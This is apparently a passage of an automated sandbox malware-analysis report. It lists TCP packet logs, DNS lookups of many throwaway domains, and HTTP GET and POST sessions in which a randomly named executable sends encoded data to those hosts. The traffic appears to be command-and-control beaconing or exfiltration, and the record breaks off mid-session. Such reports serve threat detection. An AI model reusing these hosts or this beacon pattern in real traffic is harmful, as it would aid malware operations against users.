Jan 10, 2025 20:49:44.683696032 CET | 49998 | 80 | 192.168.2.6 | 112.175.247.179
Jan 10, 2025 20:49:44.683763027 CET | 49998 | 80 | 192.168.2.6 | 112.175.247.179
                                                                                                                    Jan 10, 2025 20:49:44.685189962 CET8049998112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:44.685220957 CET8049998112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:44.685233116 CET8049998112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:44.685245037 CET4999880192.168.2.6112.175.247.179
                                                                                                                    Jan 10, 2025 20:49:44.685275078 CET4999880192.168.2.6112.175.247.179
                                                                                                                    Jan 10, 2025 20:49:44.700551987 CET8049998112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:44.700571060 CET8049998112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:44.700622082 CET8049998112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:44.700649023 CET4999880192.168.2.6112.175.247.179
                                                                                                                    Jan 10, 2025 20:49:44.700683117 CET4999880192.168.2.6112.175.247.179
                                                                                                                    Jan 10, 2025 20:49:44.796911955 CET4999880192.168.2.6112.175.247.179
                                                                                                                    Jan 10, 2025 20:49:45.815432072 CET4999980192.168.2.6112.175.247.179
                                                                                                                    Jan 10, 2025 20:49:45.820384026 CET8049999112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:45.820524931 CET4999980192.168.2.6112.175.247.179
                                                                                                                    Jan 10, 2025 20:49:45.829828024 CET4999980192.168.2.6112.175.247.179
                                                                                                                    Jan 10, 2025 20:49:45.834649086 CET8049999112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:46.967080116 CET8049999112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:46.967220068 CET8049999112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:46.967442989 CET4999980192.168.2.6112.175.247.179
                                                                                                                    Jan 10, 2025 20:49:46.975423098 CET4999980192.168.2.6112.175.247.179
                                                                                                                    Jan 10, 2025 20:49:46.980268002 CET8049999112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:52.077529907 CET5000080192.168.2.6194.9.94.86
                                                                                                                    Jan 10, 2025 20:49:52.082407951 CET8050000194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:52.082525969 CET5000080192.168.2.6194.9.94.86
                                                                                                                    Jan 10, 2025 20:49:52.100171089 CET5000080192.168.2.6194.9.94.86
                                                                                                                    Jan 10, 2025 20:49:52.105020046 CET8050000194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:52.737390041 CET8050000194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:52.737443924 CET8050000194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:52.737481117 CET8050000194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:52.737517118 CET8050000194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:52.737552881 CET8050000194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:52.737586021 CET5000080192.168.2.6194.9.94.86
                                                                                                                    Jan 10, 2025 20:49:52.737588882 CET8050000194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:52.737629890 CET8050000194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:52.737657070 CET5000080192.168.2.6194.9.94.86
                                                                                                                    Jan 10, 2025 20:49:52.737704039 CET5000080192.168.2.6194.9.94.86
                                                                                                                    Jan 10, 2025 20:49:53.609559059 CET5000080192.168.2.6194.9.94.86
                                                                                                                    Jan 10, 2025 20:49:54.628190041 CET5000180192.168.2.6194.9.94.86
                                                                                                                    Jan 10, 2025 20:49:54.633167028 CET8050001194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:54.633249998 CET5000180192.168.2.6194.9.94.86
                                                                                                                    Jan 10, 2025 20:49:54.648653030 CET5000180192.168.2.6194.9.94.86
                                                                                                                    Jan 10, 2025 20:49:54.653536081 CET8050001194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:55.362905025 CET8050001194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:55.362938881 CET8050001194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:55.362951040 CET8050001194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:55.362962008 CET8050001194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:55.362974882 CET8050001194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:55.362988949 CET8050001194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:55.363010883 CET5000180192.168.2.6194.9.94.86
                                                                                                                    Jan 10, 2025 20:49:55.363070011 CET5000180192.168.2.6194.9.94.86
                                                                                                                    Jan 10, 2025 20:49:56.156465054 CET5000180192.168.2.6194.9.94.86
                                                                                                                    Jan 10, 2025 20:49:57.175303936 CET5000280192.168.2.6194.9.94.86
                                                                                                                    Jan 10, 2025 20:49:57.180403948 CET8050002194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:57.180633068 CET5000280192.168.2.6194.9.94.86
                                                                                                                    Jan 10, 2025 20:49:57.195400953 CET5000280192.168.2.6194.9.94.86
                                                                                                                    Jan 10, 2025 20:49:57.200323105 CET8050002194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:57.200499058 CET8050002194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:57.836009026 CET8050002194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:57.836025953 CET8050002194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:57.836033106 CET8050002194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:57.836039066 CET8050002194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:57.836047888 CET8050002194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:57.836060047 CET8050002194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:57.836126089 CET5000280192.168.2.6194.9.94.86
                                                                                                                    Jan 10, 2025 20:49:57.836210012 CET5000280192.168.2.6194.9.94.86
                                                                                                                    Jan 10, 2025 20:49:58.703191996 CET5000280192.168.2.6194.9.94.86
                                                                                                                    Jan 10, 2025 20:49:59.722214937 CET5000480192.168.2.6194.9.94.86
                                                                                                                    Jan 10, 2025 20:49:59.727140903 CET8050004194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:59.727230072 CET5000480192.168.2.6194.9.94.86
                                                                                                                    Jan 10, 2025 20:49:59.736903906 CET5000480192.168.2.6194.9.94.86
                                                                                                                    Jan 10, 2025 20:49:59.742583990 CET8050004194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:00.378561974 CET8050004194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:00.378587961 CET8050004194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:00.378602028 CET8050004194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:00.378614902 CET8050004194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:00.378626108 CET8050004194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:00.378638983 CET8050004194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:00.378650904 CET8050004194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:00.378665924 CET8050004194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:00.378766060 CET5000480192.168.2.6194.9.94.86
                                                                                                                    Jan 10, 2025 20:50:00.378952980 CET5000480192.168.2.6194.9.94.86
                                                                                                                    Jan 10, 2025 20:50:00.383894920 CET5000480192.168.2.6194.9.94.86
                                                                                                                    Jan 10, 2025 20:50:00.388670921 CET8050004194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:05.418518066 CET5000580192.168.2.6194.245.148.189
                                                                                                                    Jan 10, 2025 20:50:05.423377991 CET8050005194.245.148.189192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:05.423721075 CET5000580192.168.2.6194.245.148.189
                                                                                                                    Jan 10, 2025 20:50:05.437649965 CET5000580192.168.2.6194.245.148.189
                                                                                                                    Jan 10, 2025 20:50:05.442549944 CET8050005194.245.148.189192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:06.041709900 CET8050005194.245.148.189192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:06.042010069 CET8050005194.245.148.189192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:06.042071104 CET5000580192.168.2.6194.245.148.189
                                                                                                                    Jan 10, 2025 20:50:06.952990055 CET5000580192.168.2.6194.245.148.189
                                                                                                                    Jan 10, 2025 20:50:07.971667051 CET5000680192.168.2.6194.245.148.189
                                                                                                                    Jan 10, 2025 20:50:07.976625919 CET8050006194.245.148.189192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:07.976705074 CET5000680192.168.2.6194.245.148.189
                                                                                                                    Jan 10, 2025 20:50:07.991530895 CET5000680192.168.2.6194.245.148.189
                                                                                                                    Jan 10, 2025 20:50:07.996535063 CET8050006194.245.148.189192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:08.595400095 CET8050006194.245.148.189192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:08.595568895 CET8050006194.245.148.189192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:08.595628977 CET5000680192.168.2.6194.245.148.189
                                                                                                                    Jan 10, 2025 20:50:09.499886990 CET5000680192.168.2.6194.245.148.189
                                                                                                                    Jan 10, 2025 20:50:10.519347906 CET5000780192.168.2.6194.245.148.189
                                                                                                                    Jan 10, 2025 20:50:10.524219990 CET8050007194.245.148.189192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:10.524317026 CET5000780192.168.2.6194.245.148.189
                                                                                                                    Jan 10, 2025 20:50:10.539935112 CET5000780192.168.2.6194.245.148.189
                                                                                                                    Jan 10, 2025 20:50:10.544780016 CET8050007194.245.148.189192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:10.544883966 CET8050007194.245.148.189192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:11.158746004 CET8050007194.245.148.189192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:11.158765078 CET8050007194.245.148.189192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:11.158931017 CET5000780192.168.2.6194.245.148.189
                                                                                                                    Jan 10, 2025 20:50:12.047036886 CET5000780192.168.2.6194.245.148.189
                                                                                                                    Jan 10, 2025 20:50:13.066936970 CET5000880192.168.2.6194.245.148.189
                                                                                                                    Jan 10, 2025 20:50:13.071710110 CET8050008194.245.148.189192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:13.071774960 CET5000880192.168.2.6194.245.148.189
                                                                                                                    Jan 10, 2025 20:50:13.080565929 CET5000880192.168.2.6194.245.148.189
                                                                                                                    Jan 10, 2025 20:50:13.085324049 CET8050008194.245.148.189192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:13.689943075 CET8050008194.245.148.189192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:13.689954042 CET8050008194.245.148.189192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:13.689970970 CET8050008194.245.148.189192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:13.690180063 CET5000880192.168.2.6194.245.148.189
                                                                                                                    Jan 10, 2025 20:50:13.693033934 CET5000880192.168.2.6194.245.148.189
                                                                                                                    Jan 10, 2025 20:50:13.697777033 CET8050008194.245.148.189192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:27.740206957 CET5000980192.168.2.6208.91.197.27
                                                                                                                    Jan 10, 2025 20:50:27.745189905 CET8050009208.91.197.27192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:27.745265961 CET5000980192.168.2.6208.91.197.27
                                                                                                                    Jan 10, 2025 20:50:27.761631966 CET5000980192.168.2.6208.91.197.27
                                                                                                                    Jan 10, 2025 20:50:27.767384052 CET8050009208.91.197.27192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:28.268884897 CET8050009208.91.197.27192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:28.269010067 CET5000980192.168.2.6208.91.197.27
                                                                                                                    Jan 10, 2025 20:50:29.265532017 CET5000980192.168.2.6208.91.197.27
                                                                                                                    Jan 10, 2025 20:50:29.270651102 CET8050009208.91.197.27192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:30.314347029 CET5001080192.168.2.6208.91.197.27
                                                                                                                    Jan 10, 2025 20:50:30.319310904 CET8050010208.91.197.27192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:30.319473028 CET5001080192.168.2.6208.91.197.27
                                                                                                                    Jan 10, 2025 20:50:30.399625063 CET5001080192.168.2.6208.91.197.27
                                                                                                                    Jan 10, 2025 20:50:30.404520988 CET8050010208.91.197.27192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:30.842740059 CET8050010208.91.197.27192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:30.843004942 CET5001080192.168.2.6208.91.197.27
                                                                                                                    Jan 10, 2025 20:50:31.906127930 CET5001080192.168.2.6208.91.197.27
                                                                                                                    Jan 10, 2025 20:50:31.910932064 CET8050010208.91.197.27192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:32.928545952 CET5001180192.168.2.6208.91.197.27
                                                                                                                    Jan 10, 2025 20:50:32.933487892 CET8050011208.91.197.27192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:32.933623075 CET5001180192.168.2.6208.91.197.27
                                                                                                                    Jan 10, 2025 20:50:33.071135998 CET5001180192.168.2.6208.91.197.27
                                                                                                                    Jan 10, 2025 20:50:33.076122046 CET8050011208.91.197.27192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:33.076188087 CET8050011208.91.197.27192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:33.461766005 CET8050011208.91.197.27192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:33.461842060 CET5001180192.168.2.6208.91.197.27
                                                                                                                    Jan 10, 2025 20:50:34.593616009 CET5001180192.168.2.6208.91.197.27
                                                                                                                    Jan 10, 2025 20:50:34.598541975 CET8050011208.91.197.27192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:35.612791061 CET5001280192.168.2.6208.91.197.27
                                                                                                                    Jan 10, 2025 20:50:35.618908882 CET8050012208.91.197.27192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:35.619015932 CET5001280192.168.2.6208.91.197.27
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 10, 2025 20:48:36.553919077 CET | 192.168.2.6 | 1.1.1.1 | 0xb4f7 | Standard query (0) | www.1337street.shop | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:48:41.590146065 CET | 192.168.2.6 | 1.1.1.1 | 0x91b6 | Standard query (0) | www.mosquitoxp.lol | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:48:48.738039017 CET | 192.168.2.6 | 1.1.1.1 | 0x7d9e | Standard query (0) | www.clubhoodies.shop | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:48:53.768492937 CET | 192.168.2.6 | 1.1.1.1 | 0xaa30 | Standard query (0) | www.jrcov55qgcxp5fwa.top | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:49:10.082072973 CET | 192.168.2.6 | 1.1.1.1 | 0x509b | Standard query (0) | www.winningpath.xyz | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:49:23.487555027 CET | 192.168.2.6 | 1.1.1.1 | 0xda22 | Standard query (0) | www.buyspeechst.shop | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:49:36.832091093 CET | 192.168.2.6 | 1.1.1.1 | 0x14d7 | Standard query (0) | www.dodowo.shop | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:49:37.828212023 CET | 192.168.2.6 | 1.1.1.1 | 0x14d7 | Standard query (0) | www.dodowo.shop | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:49:51.988637924 CET | 192.168.2.6 | 1.1.1.1 | 0x1de1 | Standard query (0) | www.milp.store | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:50:05.394680977 CET | 192.168.2.6 | 1.1.1.1 | 0xd094 | Standard query (0) | www.did-ready.info | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:50:18.707369089 CET | 192.168.2.6 | 1.1.1.1 | 0x2570 | Standard query (0) | www.vipstargold.buzz | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:50:27.502366066 CET | 192.168.2.6 | 1.1.1.1 | 0x438d | Standard query (0) | www.deacapalla.online | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:50:41.675653934 CET | 192.168.2.6 | 1.1.1.1 | 0x7c99 | Standard query (0) | www.thomet.net | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:50:49.738352060 CET | 192.168.2.6 | 1.1.1.1 | 0x7cd2 | Standard query (0) | www.apptj7.xyz | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:50:58.191602945 CET | 192.168.2.6 | 1.1.1.1 | 0xe71b | Standard query (0) | www.infovea.tech | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 10, 2025 20:48:36.563625097 CET | 1.1.1.1 | 192.168.2.6 | 0xb4f7 | Name error (3) | www.1337street.shop | none | none | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:48:41.651665926 CET | 1.1.1.1 | 192.168.2.6 | 0x91b6 | No error (0) | www.mosquitoxp.lol | | 127.0.0.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:48:48.752010107 CET | 1.1.1.1 | 192.168.2.6 | 0x7d9e | Name error (3) | www.clubhoodies.shop | none | none | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:48:54.146317005 CET | 1.1.1.1 | 192.168.2.6 | 0xaa30 | No error (0) | www.jrcov55qgcxp5fwa.top | zcdn.8383dns.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 10, 2025 20:48:54.146317005 CET | 1.1.1.1 | 192.168.2.6 | 0xaa30 | No error (0) | zcdn.8383dns.com | | 134.122.133.80 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:48:54.146317005 CET | 1.1.1.1 | 192.168.2.6 | 0xaa30 | No error (0) | zcdn.8383dns.com | | 134.122.135.48 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:49:10.095906973 CET | 1.1.1.1 | 192.168.2.6 | 0x509b | No error (0) | www.winningpath.xyz | | 209.74.79.41 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:49:23.501699924 CET | 1.1.1.1 | 192.168.2.6 | 0xda22 | No error (0) | www.buyspeechst.shop | | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:49:23.501699924 CET | 1.1.1.1 | 192.168.2.6 | 0xda22 | No error (0) | www.buyspeechst.shop | | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:49:23.501699924 CET | 1.1.1.1 | 192.168.2.6 | 0xda22 | No error (0) | www.buyspeechst.shop | | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:49:23.501699924 CET | 1.1.1.1 | 192.168.2.6 | 0xda22 | No error (0) | www.buyspeechst.shop | | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:49:23.501699924 CET | 1.1.1.1 | 192.168.2.6 | 0xda22 | No error (0) | www.buyspeechst.shop | | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:49:23.501699924 CET | 1.1.1.1 | 192.168.2.6 | 0xda22 | No error (0) | www.buyspeechst.shop | | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:49:23.501699924 CET | 1.1.1.1 | 192.168.2.6 | 0xda22 | No error (0) | www.buyspeechst.shop | | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:49:38.171230078 CET | 1.1.1.1 | 192.168.2.6 | 0x14d7 | No error (0) | www.dodowo.shop | dodowo.shop | | CNAME (Canonical name) | IN (0x0001) | false
Jan 10, 2025 20:49:38.171230078 CET | 1.1.1.1 | 192.168.2.6 | 0x14d7 | No error (0) | dodowo.shop | | 112.175.247.179 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:49:38.171334982 CET | 1.1.1.1 | 192.168.2.6 | 0x14d7 | No error (0) | www.dodowo.shop | dodowo.shop | | CNAME (Canonical name) | IN (0x0001) | false
Jan 10, 2025 20:49:38.171334982 CET | 1.1.1.1 | 192.168.2.6 | 0x14d7 | No error (0) | dodowo.shop | | 112.175.247.179 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:49:52.074727058 CET | 1.1.1.1 | 192.168.2.6 | 0x1de1 | No error (0) | www.milp.store | | 194.9.94.86 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:49:52.074727058 CET | 1.1.1.1 | 192.168.2.6 | 0x1de1 | No error (0) | www.milp.store | | 194.9.94.85 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:50:05.416083097 CET | 1.1.1.1 | 192.168.2.6 | 0xd094 | No error (0) | www.did-ready.info | | 194.245.148.189 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:50:19.363799095 CET | 1.1.1.1 | 192.168.2.6 | 0x2570 | Server failure (2) | www.vipstargold.buzz | none | none | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:50:27.735404968 CET | 1.1.1.1 | 192.168.2.6 | 0x438d | No error (0) | www.deacapalla.online | | 208.91.197.27 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:50:41.684838057 CET | 1.1.1.1 | 192.168.2.6 | 0x7c99 | Name error (3) | www.thomet.net | none | none | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:50:50.136668921 CET | 1.1.1.1 | 192.168.2.6 | 0x7cd2 | Name error (3) | www.apptj7.xyz | none | none | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:50:58.203741074 CET | 1.1.1.1 | 192.168.2.6 | 0xe71b | No error (0) | www.infovea.tech | infovea.tech | | CNAME (Canonical name) | IN (0x0001) | false
Jan 10, 2025 20:50:58.203741074 CET | 1.1.1.1 | 192.168.2.6 | 0xe71b | No error (0) | infovea.tech | | 76.223.67.189 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:50:58.203741074 CET | 1.1.1.1 | 192.168.2.6 | 0xe71b | No error (0) | infovea.tech | | 13.248.213.45 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49985 | 134.122.133.80 | 80 | 2196 | C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 20:48:54.241776943 CET | 591 | OUT | GET /ah2l/?nzs0T2=0XIysXmjicdWgm2GWI+Thi8VIPF50KgCrB9qe1pxW9F6KmTtpKViQSnjO8JFZFRtQOT2SKyqDZIyiHstHNrbonPRFLzX8YNbLN93hXWxhTtjpF1XokGMpx8sFq4HkBm76WFwIOg=&mLFl=BXYPt2lXBpi8Dj HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Host: www.jrcov55qgcxp5fwa.top
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
Jan 10, 2025 20:48:55.028470039 CET | 708 | IN | HTTP/1.1 404 Not Found
Content-Length: 548
Content-Type: text/html
Date: Fri, 10 Jan 2025 19:48:54 GMT
Server: nginx
X-Cache: BYPASS
Connection: close
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49987 | 209.74.79.41 | 80 | 2196 | C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 20:49:10.118778944 CET | 845 | OUT | POST /4p8s/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.winningpath.xyz
Origin: http://www.winningpath.xyz
Referer: http://www.winningpath.xyz/4p8s/
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 211
User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
                                                                                                                    Data Ascii: nzs0T2=hZAaBrxx1KFPNheFCxDQiELGgu6fxGJhmlU21IL50Ds2AlN4uM8+CMWo5ouMihaps52h+QzJVN2L7JOyiwXLd5VXuq+yWtzk0tE65PVHQKiK3CxZJYRR88vJr7sWjuul7fWrZ4Ccw/czD15dj+aSzFLuratmoZcDfeQ4NrTpO5aPgvPMF4sBC/B1V7Qv8t/WLqPlPLUqmsfb
                                                                                                                    Jan 10, 2025 20:49:10.711013079 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Date: Fri, 10 Jan 2025 19:49:10 GMT
                                                                                                                    Server: Apache
                                                                                                                    Content-Length: 389
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    2 | 192.168.2.6 | 49988 | 209.74.79.41 | 80 | 2196 | C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Jan 10, 2025 20:49:12.664268017 CET | 869 | OUT | POST /4p8s/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.winningpath.xyz
                                                                                                                    Origin: http://www.winningpath.xyz
                                                                                                                    Referer: http://www.winningpath.xyz/4p8s/
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 235
